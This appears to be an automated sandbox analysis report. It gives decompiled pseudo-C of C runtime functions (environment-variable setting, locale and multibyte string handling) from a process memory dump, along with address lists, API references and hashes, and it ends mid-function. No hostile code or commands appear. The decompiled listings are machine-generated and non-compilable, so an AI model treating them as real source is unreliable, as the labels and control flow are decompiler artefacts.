				signed int _t125;
				signed int _t126;
				void* _t131;
				intOrPtr* _t135;
				signed int _t139;
				signed int _t141;
				void* _t142;
				void* _t143;
				signed int _t144;
				signed int _t146;
				signed int* _t147;
				signed int _t152;
				signed int _t153;
				CHAR* _t154;
				signed int _t155;
				signed int* _t156;
				signed int _t157;
				signed int _t159;
				void* _t164;
				void* _t166;
				void* _t167;

				_t111 = _a4;
				if(_t111 != 0) {
					_t144 = _t111;
					_t58 = E004C4160(_t111, 0x3d);
					_v16 = _t58;
					_t119 = _t143;
					__eflags = _t58;
					if(_t58 == 0) {
						L10:
						 *((intOrPtr*)(E004A966E())) = 0x16;
						goto L11;
					} else {
						__eflags = _t58 - _t111;
						if(_t58 == _t111) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t58 + 1));
							_t152 =  *0x4ee6c8; // 0x7f41d8
							_t62 = _t58 & 0xffffff00 |  *((char*)(_t58 + 1)) == 0x00000000;
							_v5 = _t62;
							__eflags = _t152 -  *0x4ee6d4; // 0x7f41d8
							if(__eflags == 0) {
								L44();
								_t152 = _t62;
								_t62 = _v5;
								_t119 = _t152;
								 *0x4ee6c8 = _t152;
							}
							_t112 = 0;
							__eflags = _t152;
							if(_t152 != 0) {
								L21:
								_t121 = _t144;
								_t64 = _v16 - _t121;
								_push(_t64);
								_push(_t121);
								L61();
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 < 0) {
									L29:
									__eflags = _v5 - _t112;
									if(_v5 != _t112) {
										goto L12;
									} else {
										_t65 =  ~_t64;
										_v12 = _t65;
										_t27 = _t65 + 2; // 0x2
										_t124 = _t27;
										__eflags = _t124 - _t65;
										if(_t124 < _t65) {
											goto L11;
										} else {
											__eflags = _t124 - 0x3fffffff;
											if(_t124 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t124);
												_t153 = L004B2CEB(_t152);
												E004B2FCF(_t112);
												_t166 = _t166 + 0x10;
												__eflags = _t153;
												if(_t153 == 0) {
													goto L11;
												} else {
													_t125 = _v12;
													_t144 = _t112;
													_t68 = _a4;
													 *(_t153 + _t125 * 4) = _t68;
													 *(_t153 + 4 + _t125 * 4) = _t112;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t152 - _t112;
									if( *_t152 == _t112) {
										goto L29;
									} else {
										E004B2FCF( *((intOrPtr*)(_t152 + _t64 * 4)));
										_t141 = _v12;
										__eflags = _v5 - _t112;
										if(_v5 != _t112) {
											while(1) {
												__eflags =  *(_t152 + _t141 * 4) - _t112;
												if( *(_t152 + _t141 * 4) == _t112) {
													break;
												}
												 *(_t152 + _t141 * 4) =  *(_t152 + 4 + _t141 * 4);
												_t141 = _t141 + 1;
												__eflags = _t141;
											}
											_push(4);
											_push(_t141);
											_t153 = L004B2CEB(_t152);
											E004B2FCF(_t112);
											_t166 = _t166 + 0x10;
											_t68 = _t144;
											__eflags = _t153;
											if(_t153 != 0) {
												L34:
												 *0x4ee6c8 = _t153;
											}
										} else {
											_t68 = _a4;
											_t144 = _t112;
											 *(_t152 + _t141 * 4) = _t68;
										}
										__eflags = _a8 - _t112;
										if(_a8 == _t112) {
											goto L12;
										} else {
											_t126 = _t68;
											_t142 = _t126 + 1;
											do {
												_t69 =  *_t126;
												_t126 = _t126 + 1;
												__eflags = _t69;
											} while (_t69 != 0);
											_v12 = _t126 - _t142 + 2;
											_t154 = E004B2F72(_t126 - _t142, _t126 - _t142 + 2, 1);
											_pop(_t129);
											__eflags = _t154;
											if(_t154 == 0) {
												L42:
												E004B2FCF(_t154);
												goto L12;
											} else {
												_t73 = E004AD3A2(_t154, _v12, _a4);
												_t167 = _t166 + 0xc;
												__eflags = _t73;
												if(_t73 != 0) {
													_push(_t112);
													_push(_t112);
													_push(_t112);
													_push(_t112);
													_push(_t112);
													L004A5EA4(_t73);
													asm("int3");
													_t164 = _t167;
													_push(_t144);
													_t146 = _v44;
													__eflags = _t146;
													if(_t146 != 0) {
														_t131 = 0;
														_t75 = _t146;
														__eflags =  *_t146;
														if( *_t146 != 0) {
															do {
																_t75 =  &(_t75[1]);
																_t131 = _t131 + 1;
																__eflags =  *_t75;
															} while ( *_t75 != 0);
														}
														_push(_t154);
														_t47 = _t131 + 1; // 0x2
														_t155 = E004B2F72(_t131, _t47, 4);
														__eflags = _t155;
														if(_t155 == 0) {
															L59:
															L004AEA83(_t112, _t142, _t146, _t155);
															goto L60;
														} else {
															__eflags =  *_t146;
															if( *_t146 == 0) {
																L57:
																E004B2FCF(0);
																_t86 = _t155;
																goto L58;
															} else {
																_push(_t112);
																_t112 = _t155 - _t146;
																__eflags = _t112;
																do {
																	_t135 =  *_t146;
																	_t48 = _t135 + 1; // 0x5
																	_t142 = _t48;
																	do {
																		_t87 =  *_t135;
																		_t135 = _t135 + 1;
																		__eflags = _t87;
																	} while (_t87 != 0);
																	_t49 = _t135 - _t142 + 1; // 0x6
																	_v12 = _t49;
																	 *(_t112 + _t146) = E004B2F72(_t135 - _t142, _t49, 1);
																	E004B2FCF(0);
																	_t167 = _t167 + 0xc;
																	__eflags =  *(_t112 + _t146);
																	if( *(_t112 + _t146) == 0) {
																		goto L59;
																	} else {
																		_t91 = E004AD3A2( *(_t112 + _t146), _v12,  *_t146);
																		_t167 = _t167 + 0xc;
																		__eflags = _t91;
																		if(_t91 != 0) {
																			L60:
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			L004A5EA4(0);
																			asm("int3");
																			_push(_t164);
																			_push(_t112);
																			_push(_t155);
																			_push(_t146);
																			_t147 =  *0x4ee6c8; // 0x7f41d8
																			_t156 = _t147;
																			__eflags =  *_t147;
																			if( *_t147 == 0) {
																				L67:
																				_t157 = _t156 - _t147;
																				__eflags = _t157;
																				_t159 =  ~(_t157 >> 2);
																			} else {
																				_t115 = _v0;
																				do {
																					_t82 = E004B909A(_v4,  *_t156, _t115);
																					_t167 = _t167 + 0xc;
																					__eflags = _t82;
																					if(_t82 != 0) {
																						goto L66;
																					} else {
																						_t84 =  *((intOrPtr*)(_t115 +  *_t156));
																						__eflags = _t84 - 0x3d;
																						if(_t84 == 0x3d) {
																							L69:
																							_t159 = _t156 - _t147 >> 2;
																						} else {
																							__eflags = _t84;
																							if(_t84 == 0) {
																								goto L69;
																							} else {
																								goto L66;
																							}
																						}
																					}
																					goto L68;
																					L66:
																					_t156 =  &(_t156[1]);
																					__eflags =  *_t156;
																				} while ( *_t156 != 0);
																				goto L67;
																			}
																			L68:
																			return _t159;
																		} else {
																			goto L55;
																		}
																	}
																	goto L70;
																	L55:
																	_t146 = _t146 + 4;
																	__eflags =  *_t146 - _t91;
																} while ( *_t146 != _t91);
																goto L57;
															}
														}
													} else {
														_t86 = 0;
														L58:
														return _t86;
													}
												} else {
													_t139 = _v16 + 1 + _t154 - _a4;
													asm("sbb eax, eax");
													 *(_t139 - 1) = _t112;
													_t98 = SetEnvironmentVariableA(_t154,  !( ~(_v5 & 0x000000ff)) & _t139);
													__eflags = _t98;
													if(_t98 == 0) {
														_t99 = E004A966E();
														_t112 = _t112 | 0xffffffff;
														__eflags = _t112;
														 *_t99 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t62;
									if(_t62 == 0) {
										 *0x4ee6c8 = E004B2F72(_t119, 1, 4);
										E004B2FCF(_t112);
										_t152 =  *0x4ee6c8; // 0x7f41d8
										_t166 = _t166 + 0xc;
										__eflags = _t152;
										if(_t152 == 0) {
											goto L11;
										} else {
											__eflags =  *0x4ee6cc - _t112; // 0x0
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x4ee6cc = E004B2F72(_t119, 1, 4);
												E004B2FCF(_t112);
												_t166 = _t166 + 0xc;
												__eflags =  *0x4ee6cc - _t112; // 0x0
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t112 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x4ee6cc - _t112; // 0x0
									if(__eflags == 0) {
										goto L14;
									} else {
										_t108 = L004B12D1(0);
										__eflags = _t108;
										if(_t108 != 0) {
											L19:
											_t152 =  *0x4ee6c8; // 0x7f41d8
											L20:
											__eflags = _t152;
											if(_t152 == 0) {
												L11:
												_t112 = _t111 | 0xffffffff;
												__eflags = _t112;
												L12:
												E004B2FCF(_t144);
												_t61 = _t112;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E004A966E();
					 *_t109 = 0x16;
					_t61 = _t109 | 0xffffffff;
					L13:
					return _t61;
				}
				L70:
			}

0x004bc50e
0x004bc513
0x004bc52a
0x004bc52c
0x004bc531
0x004bc535
0x004bc536
0x004bc538
0x004bc588
0x004bc58d
0x00000000
0x004bc53a
0x004bc53a
0x004bc53c
0x00000000
0x004bc53e
0x004bc53e
0x004bc542
0x004bc548
0x004bc54b
0x004bc54e
0x004bc554
0x004bc557
0x004bc55c
0x004bc55e
0x004bc561
0x004bc562
0x004bc562
0x004bc568
0x004bc56a
0x004bc56c
0x004bc600
0x004bc603
0x004bc605
0x004bc607
0x004bc608
0x004bc609
0x004bc60e
0x004bc613
0x004bc615
0x004bc65f
0x004bc65f
0x004bc662
0x00000000
0x004bc668
0x004bc668
0x004bc66a
0x004bc66d
0x004bc66d
0x004bc670
0x004bc672
0x00000000
0x004bc678
0x004bc678
0x004bc67e
0x00000000
0x004bc684
0x004bc684
0x004bc686
0x004bc68e
0x004bc690
0x004bc695
0x004bc698
0x004bc69a
0x00000000
0x004bc6a0
0x004bc6a0
0x004bc6a3
0x004bc6a5
0x004bc6a8
0x004bc6ab
0x00000000
0x004bc6ab
0x004bc69a
0x004bc67e
0x004bc672
0x004bc617
0x004bc617
0x004bc619
0x00000000
0x004bc61b
0x004bc61e
0x004bc624
0x004bc627
0x004bc62a
0x004bc63e
0x004bc63e
0x004bc641
0x00000000
0x00000000
0x004bc63a
0x004bc63d
0x004bc63d
0x004bc63d
0x004bc643
0x004bc645
0x004bc64d
0x004bc64f
0x004bc654
0x004bc657
0x004bc659
0x004bc65b
0x004bc6af
0x004bc6af
0x004bc6af
0x004bc62c
0x004bc62c
0x004bc62f
0x004bc631
0x004bc631
0x004bc6b5
0x004bc6b8
0x00000000
0x004bc6be
0x004bc6be
0x004bc6c0
0x004bc6c3
0x004bc6c3
0x004bc6c5
0x004bc6c6
0x004bc6c6
0x004bc6d2
0x004bc6da
0x004bc6dd
0x004bc6de
0x004bc6e0
0x004bc729
0x004bc72a
0x00000000
0x004bc6e2
0x004bc6e9
0x004bc6ee
0x004bc6f1
0x004bc6f3
0x004bc735
0x004bc736
0x004bc737
0x004bc738
0x004bc739
0x004bc73a
0x004bc73f
0x004bc743
0x004bc746
0x004bc747
0x004bc74a
0x004bc74c
0x004bc755
0x004bc757
0x004bc759
0x004bc75b
0x004bc75d
0x004bc75d
0x004bc760
0x004bc761
0x004bc761
0x004bc75d
0x004bc766
0x004bc767
0x004bc772
0x004bc776
0x004bc778
0x004bc7df
0x004bc7df
0x00000000
0x004bc77a
0x004bc77a
0x004bc77d
0x004bc7cf
0x004bc7d1
0x004bc7d7
0x00000000
0x004bc77f
0x004bc77f
0x004bc782
0x004bc782
0x004bc784
0x004bc784
0x004bc786
0x004bc786
0x004bc789
0x004bc789
0x004bc78b
0x004bc78c
0x004bc78c
0x004bc794
0x004bc798
0x004bc7a2
0x004bc7a5
0x004bc7aa
0x004bc7ad
0x004bc7b1
0x00000000
0x004bc7b3
0x004bc7bb
0x004bc7c0
0x004bc7c3
0x004bc7c5
0x004bc7e4
0x004bc7e6
0x004bc7e7
0x004bc7e8
0x004bc7e9
0x004bc7ea
0x004bc7eb
0x004bc7f0
0x004bc7f3
0x004bc7f6
0x004bc7f7
0x004bc7f8
0x004bc7f9
0x004bc7ff
0x004bc801
0x004bc804
0x004bc830
0x004bc830
0x004bc830
0x004bc835
0x004bc806
0x004bc806
0x004bc809
0x004bc80f
0x004bc814
0x004bc817
0x004bc819
0x00000000
0x004bc81b
0x004bc81d
0x004bc820
0x004bc822
0x004bc83e
0x004bc840
0x004bc824
0x004bc824
0x004bc826
0x00000000
0x00000000
0x00000000
0x00000000
0x004bc826
0x004bc822
0x00000000
0x004bc828
0x004bc828
0x004bc82b
0x004bc82b
0x00000000
0x004bc809
0x004bc837
0x004bc83d
0x00000000
0x00000000
0x00000000
0x004bc7c5
0x00000000
0x004bc7c7
0x004bc7c7
0x004bc7ca
0x004bc7ca
0x00000000
0x004bc7ce
0x004bc77d
0x004bc74e
0x004bc74e
0x004bc7da
0x004bc7de
0x004bc7de
0x004bc6f5
0x004bc6fe
0x004bc706
0x004bc70a
0x004bc711
0x004bc717
0x004bc719
0x004bc71b
0x004bc720
0x004bc720
0x004bc723
0x004bc723
0x00000000
0x004bc719
0x004bc6f3
0x004bc6e0
0x004bc6b8
0x004bc619
0x004bc572
0x004bc572
0x004bc575
0x004bc5a6
0x004bc5a6
0x004bc5a8
0x004bc5b8
0x004bc5bd
0x004bc5c2
0x004bc5c8
0x004bc5cb
0x004bc5cd
0x00000000
0x004bc5cf
0x004bc5cf
0x004bc5d5
0x00000000
0x004bc5d7
0x004bc5e1
0x004bc5e6
0x004bc5eb
0x004bc5ee
0x004bc5f4
0x00000000
0x00000000
0x00000000
0x00000000
0x004bc5f4
0x004bc5d5
0x004bc5aa
0x004bc5aa
0x00000000
0x004bc5aa
0x004bc577
0x004bc577
0x004bc57d
0x00000000
0x004bc57f
0x004bc57f
0x004bc584
0x004bc586
0x004bc5f6
0x004bc5f6
0x004bc5fc
0x004bc5fc
0x004bc5fe
0x004bc593
0x004bc593
0x004bc593
0x004bc596
0x004bc597
0x004bc59e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004bc586
0x004bc57d
0x004bc575
0x004bc56c
0x004bc53c
0x004bc515
0x004bc515
0x004bc51a
0x004bc520
0x004bc5a1
0x004bc5a5
0x004bc5a5
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 004BC52C
_free.LIBCMT ref: 004BC597
_free.LIBCMT ref: 004BC5BD
_free.LIBCMT ref: 004BC5E6
_free.LIBCMT ref: 004BC61E
_free.LIBCMT ref: 004BC64F
_free.LIBCMT ref: 004BC690
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 004BC711
_free.LIBCMT ref: 004BC72A

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 9a0761fde9f03fae805ee7746c9f6f7a76f1b335c1ab5561470eed756c41ce26
Instruction ID: fc82f5a7fd1d7989b0451a0589fba1854a25a80a3e7f81647df149d4884ec29b
Opcode Fuzzy Hash: 9a0761fde9f03fae805ee7746c9f6f7a76f1b335c1ab5561470eed756c41ce26
Instruction Fuzzy Hash: 40614971904311AFDB34AF7688C1AEB7BA4AF15314F4401AFF9009B342DA79A9018BBD

Uniqueness

Uniqueness Score: -1.00%

Function 004B2885, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E004B2885(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				intOrPtr* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t149;
				void* _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				intOrPtr* _t162;
				void* _t166;
				signed int _t167;
				intOrPtr _t169;
				signed int _t172;
				signed int _t173;
				void* _t175;
				void* _t195;
				signed int _t196;
				void* _t199;
				signed int _t204;
				signed int _t207;
				void* _t212;
				intOrPtr* _t213;
				intOrPtr* _t214;
				signed int _t225;
				signed int _t228;
				intOrPtr* _t229;
				signed int _t231;
				signed int* _t235;
				void* _t241;
				void* _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t251;
				signed int _t253;
				signed int _t257;
				signed int* _t258;
				intOrPtr* _t259;
				short _t260;
				signed int _t262;
				signed int _t264;
				void* _t266;
				void* _t268;

				_t262 = _t264;
				_t149 =  *0x4eb018; // 0xa3bb88a6
				_v8 = _t149 ^ _t262;
				_push(__ebx);
				_t207 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v744 = _t207;
				_v728 = E004B361B(_t207, _t212, _t241) + 0x278;
				_push( &_v708);
				_t156 = E004B1FCF(_t207, _t241, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
				_t266 = _t264 - 0x2e4 + 0x18;
				if(_t156 != 0) {
					_t11 = _t207 + 2; // 0x8
					_t251 = _t11 << 4;
					_t157 =  &_v272;
					_v716 = _t251;
					_t213 =  *((intOrPtr*)(_t251 + _t246));
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t253 = _v716;
						if( *_t157 !=  *_t213) {
							break;
						}
						if( *_t157 == 0) {
							L8:
							_t158 = _v704;
						} else {
							_t260 =  *((intOrPtr*)(_t157 + 2));
							_v710 = _t260;
							_t253 = _v716;
							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
								break;
							} else {
								_t157 = _t157 + 4;
								_t213 = _t213 + 4;
								if(_v710 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						if(_t158 != 0) {
							_t214 =  &_v272;
							_t243 = _t214 + 2;
							do {
								_t159 =  *_t214;
								_t214 = _t214 + 2;
							} while (_t159 != _v704);
							_v720 = (_t214 - _t243 >> 1) + 1;
							_t162 = E004B3009(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
							_v732 = _t162;
							if(_t162 == 0) {
								goto L1;
							} else {
								_v724 =  *((intOrPtr*)(_t253 + _t246));
								_t35 = _t207 * 4; // 0xbf9d
								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
								_t38 = _t246 + 8; // 0x8b56ff8b
								_v740 =  *_t38;
								_t223 =  &_v272;
								_v712 = _t162 + 4;
								_t166 = E004ADE87(_t162 + 4, _v720,  &_v272);
								_t268 = _t266 + 0xc;
								if(_t166 != 0) {
									_t167 = _v704;
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									E004A5EA4();
									asm("int3");
									_t169 =  *0x4ee700; // 0x0
									return _t169;
								} else {
									 *((intOrPtr*)(_t253 + _t246)) = _v712;
									if(_v272 != 0x43 || _v270 != 0) {
										_t172 = E004B1CDC(_t207, _t223, _t246,  &_v700);
										_t225 = _v704;
										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
									} else {
										_t225 = _v704;
										 *(_t246 + 0xa0 + _t207 * 4) = _t225;
									}
									if(_t207 != 2) {
										if(_t207 != 1) {
											if(_t207 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
										}
									} else {
										_t258 = _v728;
										_t244 = _t225;
										_t235 = _t258;
										 *(_t246 + 8) = _v708;
										_v712 = _t258;
										_v720 = _t258[8];
										_v708 = _t258[9];
										while(1) {
											_t64 = _t246 + 8; // 0x8b56ff8b
											if( *_t64 ==  *_t235) {
												break;
											}
											_t259 = _v712;
											_t244 = _t244 + 1;
											_t204 =  *_t235;
											 *_t259 = _v720;
											_v708 = _t235[1];
											_t235 = _t259 + 8;
											 *((intOrPtr*)(_t259 + 4)) = _v708;
											_t207 = _v744;
											_t258 = _v728;
											_v720 = _t204;
											_v712 = _t235;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L27:
											if(_t244 == 5) {
												_t88 = _t246 + 8; // 0x8b56ff8b
												_t195 = E004BAE04(_t207, _t246, _t258, _v704, 1, 0x406818, 0x7f,  &_v528,  *_t88, 1);
												_t268 = _t268 + 0x1c;
												_t196 = _v704;
												if(_t195 == 0) {
													_t258[1] = _t196;
												} else {
													do {
														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
														_t196 = _t196 + 1;
													} while (_t196 < 0x7f);
													_t199 = E0049FC6A( &_v528,  *0x4eb1bc, 0xfe);
													_t268 = _t268 + 0xc;
													_t258[1] = 0 | _t199 == 0x00000000;
												}
												_t103 = _t246 + 8; // 0x8b56ff8b
												 *_t258 =  *_t103;
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L38;
										}
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v720;
											 *(_t258 + 4 + _t244 * 8) = _v708;
										}
										goto L27;
									}
									L38:
									_t173 = _t207 * 0xc;
									_t110 = _t173 + 0x406758; // 0x42dfbc
									 *0x4f02b4(_t246);
									_t175 =  *((intOrPtr*)( *_t110))();
									_t228 = _v724;
									if(_t175 == 0) {
										if(_t228 != 0x4eb288) {
											_t257 = _t207 + _t207;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L43;
											} else {
												_t128 = _t257 * 8; // 0x30ff068b
												E004B2FCF( *((intOrPtr*)(_t246 + _t128 + 0x28)));
												_t131 = _t257 * 8; // 0x30ff0c46
												E004B2FCF( *((intOrPtr*)(_t246 + _t131 + 0x24)));
												_t134 = _t207 * 4; // 0xbf9d
												E004B2FCF( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
												_t231 = _v704;
												 *((intOrPtr*)(_v716 + _t246)) = _t231;
												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
											}
										}
										_t229 = _v732;
										 *_t229 = 1;
										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
									} else {
										 *(_v716 + _t246) = _t228;
										_t115 = _t207 * 4; // 0xbf9d
										E004B2FCF( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
										E004B2FCF(_v732);
										 *(_t246 + 8) = _v740;
										goto L1;
									}
									goto L2;
								}
							}
						} else {
							goto L2;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t158 = _t157 | 0x00000001;
					goto L10;
				} else {
					L1:
					L2:
					return E0049CE1D(_v8 ^ _t262);
				}
				L47:
			}

0x004b2888
0x004b2890
0x004b2897
0x004b289a
0x004b289b
0x004b289e
0x004b28a2
0x004b28a3
0x004b28a6
0x004b28b6
0x004b28c2
0x004b28d9
0x004b28de
0x004b28e3
0x004b28f8
0x004b28fb
0x004b28fe
0x004b2904
0x004b290d
0x004b290f
0x004b2912
0x004b291c
0x004b2922
0x00000000
0x00000000
0x004b2928
0x004b2951
0x004b2951
0x004b292a
0x004b292a
0x004b2932
0x004b2939
0x004b293f
0x00000000
0x004b2941
0x004b2941
0x004b2944
0x004b294f
0x00000000
0x00000000
0x00000000
0x00000000
0x004b294f
0x004b293f
0x004b295e
0x004b2960
0x004b2966
0x004b296c
0x004b296f
0x004b296f
0x004b2972
0x004b2975
0x004b2985
0x004b2993
0x004b2998
0x004b29a1
0x00000000
0x004b29a7
0x004b29ad
0x004b29b3
0x004b29ba
0x004b29c0
0x004b29c3
0x004b29c9
0x004b29d6
0x004b29dd
0x004b29e2
0x004b29e7
0x004b2c40
0x004b2c46
0x004b2c47
0x004b2c48
0x004b2c49
0x004b2c4a
0x004b2c4b
0x004b2c50
0x004b2c51
0x004b2c56
0x004b29ed
0x004b29fb
0x004b29fe
0x004b2a20
0x004b2a26
0x004b2a2c
0x004b2a0a
0x004b2a0a
0x004b2a10
0x004b2a10
0x004b2a36
0x004b2b56
0x004b2b66
0x004b2b6e
0x004b2b6e
0x004b2b58
0x004b2b5e
0x004b2b5e
0x004b2a3c
0x004b2a3c
0x004b2a42
0x004b2a4a
0x004b2a4c
0x004b2a4f
0x004b2a58
0x004b2a61
0x004b2a67
0x004b2a67
0x004b2a6c
0x00000000
0x00000000
0x004b2a6e
0x004b2a74
0x004b2a75
0x004b2a80
0x004b2a88
0x004b2a90
0x004b2a93
0x004b2a96
0x004b2a9c
0x004b2aa2
0x004b2aa8
0x004b2ab1
0x00000000
0x00000000
0x004b2ab3
0x004b2ad8
0x004b2adb
0x004b2adf
0x004b2af8
0x004b2afd
0x004b2b02
0x004b2b08
0x004b2b43
0x004b2b0a
0x004b2b0a
0x004b2b0f
0x004b2b17
0x004b2b18
0x004b2b2f
0x004b2b36
0x004b2b3e
0x004b2b3e
0x004b2b46
0x004b2b49
0x004b2b49
0x004b2b4e
0x00000000
0x004b2b4e
0x004b2ab7
0x004b2abc
0x004b2ac2
0x004b2acb
0x004b2ad4
0x004b2ad4
0x00000000
0x004b2ab7
0x004b2b71
0x004b2b71
0x004b2b75
0x004b2b7d
0x004b2b83
0x004b2b86
0x004b2b8e
0x004b2bd4
0x004b2bdb
0x004b2be1
0x004b2be5
0x00000000
0x004b2be7
0x004b2be7
0x004b2beb
0x004b2bf0
0x004b2bf4
0x004b2bf9
0x004b2c00
0x004b2c0e
0x004b2c14
0x004b2c17
0x004b2c17
0x004b2be5
0x004b2c26
0x004b2c2e
0x004b2c37
0x004b2b90
0x004b2b96
0x004b2b99
0x004b2ba0
0x004b2bb2
0x004b2bb9
0x004b2bc6
0x00000000
0x004b2bc6
0x00000000
0x004b2b8e
0x004b29e7
0x004b2962
0x00000000
0x004b2962
0x00000000
0x004b2960
0x004b2959
0x004b295b
0x00000000
0x004b28e5
0x004b28e5
0x004b28e7
0x004b28f7
0x004b28f7
0x00000000

APIs

Part of subcall function 004B361B: GetLastError.KERNEL32(?,?,004AADF3,004E8890,00000010), ref: 004B361F
Part of subcall function 004B361B: _free.LIBCMT ref: 004B3652
Part of subcall function 004B361B: SetLastError.KERNEL32(00000000), ref: 004B3693

_memcmp.LIBVCRUNTIME ref: 004B2B2F
_free.LIBCMT ref: 004B2BA0
_free.LIBCMT ref: 004B2BB9
_free.LIBCMT ref: 004B2BEB
_free.LIBCMT ref: 004B2BF4
_free.LIBCMT ref: 004B2C00

Strings

C, xrefs: 004B29ED

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorLast$_memcmp
String ID: C
API String ID: 4275183328-1037565863
Opcode ID: ffe99c5f0e32d20ec8462e4ce7ce940dd636dfd0f490fe2bbf7c2a55b950f009
Instruction ID: 1dbb4ecf0784a2d49935978fcbc54ed0954668edfbddf53bd29e5c59fea9c168
Opcode Fuzzy Hash: ffe99c5f0e32d20ec8462e4ce7ce940dd636dfd0f490fe2bbf7c2a55b950f009
Instruction Fuzzy Hash: 17B12875A0121A9FDB24DF19C984AEEB7B4FF08304F1045AEE909A7350DB75AE90CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004B9733, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E004B9733(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x4eb018; // 0xa3bb88a6
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = L004AEB21(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return L0049CE1D(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E0048B33A(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = L004B7C80(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E0048B33A(_t101);
									goto L36;
								}
